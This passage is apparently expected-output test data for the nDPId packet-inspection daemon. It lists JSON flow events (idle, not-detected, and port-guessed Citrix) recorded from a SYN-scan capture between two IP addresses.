+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3517,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3517,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52673,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52673,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1098,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3527,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1098,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3527,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7625,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7625,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7627,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50636,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7627,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50636,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1084,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1084,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 